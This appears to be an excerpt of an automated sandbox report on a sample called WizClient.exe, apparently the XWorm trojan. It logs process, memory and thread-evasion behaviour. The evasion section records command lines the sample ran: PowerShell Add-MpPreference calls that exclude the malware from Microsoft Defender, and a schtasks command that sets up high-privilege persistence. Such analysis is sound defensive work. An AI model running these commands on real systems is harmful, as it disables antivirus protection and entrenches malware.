            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\WizClient.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\WizClient.exe | Memory allocated: 970000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\WizClient.exe | Memory allocated: 1A430000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Local\WizClient.exe | Memory allocated: 2040000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Local\WizClient.exe | Memory allocated: 1A240000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Local\WizClient.exe | Memory allocated: 1070000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Local\WizClient.exe | Memory allocated: 1AC30000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Local\WizClient.exe | Memory allocated: 840000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Local\WizClient.exe | Memory allocated: 1A360000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Local\WizClient.exe | Memory allocated: C90000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Local\WizClient.exe | Memory allocated: 1A7B0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\WizClient.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Local\WizClient.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\WizClient.exe | Window / User API: threadDelayed 3466
            Source: C:\Users\user\Desktop\WizClient.exe | Window / User API: threadDelayed 6310
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5399
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4352
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7691
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1834
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7390
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2108
            Source: C:\Users\user\Desktop\WizClient.exe TID: 7652 | Thread sleep time: -36893488147419080s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8308 | Thread sleep time: -5534023222112862s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8504 | Thread sleep count: 7691 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8504 | Thread sleep count: 1834 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8532 | Thread sleep time: -8301034833169293s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8976 | Thread sleep time: -3689348814741908s >= -30000s
            Source: C:\Users\user\AppData\Local\WizClient.exe TID: 8320 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Local\WizClient.exe TID: 8260 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Local\WizClient.exe TID: 3976 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Local\WizClient.exe TID: 2568 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
            Source: C:\Users\user\Desktop\WizClient.exe | File Volume queried: C:\ FullSizeInformation
            Source: C:\Users\user\AppData\Local\WizClient.exe | File Volume queried: C:\ FullSizeInformation
            Source: WizClient.exe, 00000003.00000002.2589619208.000000001B33D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWkkr
            Source: WizClient.exe, 00000003.00000002.2589619208.000000001B33D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll{(*u
            Source: C:\Users\user\Desktop\WizClient.exe | Process information queried: ProcessInformation
            Source: C:\Users\user\Desktop\WizClient.exe | Process token adjusted: Debug
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
            Source: C:\Users\user\AppData\Local\WizClient.exe | Process token adjusted: Debug
            Source: C:\Users\user\Desktop\WizClient.exe | Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Users\user\Desktop\WizClient.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\WizClient.exe'
            Source: C:\Users\user\Desktop\WizClient.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\WizClient.exe'
            Source: C:\Users\user\Desktop\WizClient.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'WizClient.exe'
            Source: C:\Users\user\Desktop\WizClient.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "WizClient" /tr "C:\Users\user\AppData\Local\WizClient.exe"
            Source: WizClient.exe, 00000003.00000002.2561891365.0000000002566000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0
            Source: WizClient.exe, 00000003.00000002.2561891365.0000000002566000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Manager
            Source: WizClient.exe, 00000003.00000002.2561891365.0000000002566000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Manager2A%
            Source: WizClient.exe, 00000003.00000002.2561891365.0000000002566000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
            Source: WizClient.exe, 00000003.00000002.2561891365.0000000002566000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0@
            Source: C:\Users\user\Desktop\WizClient.exeQueries volume information: C:\Users\user\Desktop\WizClient.exe VolumeInformation
            Source: C:\Users\user\Desktop\WizClient.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
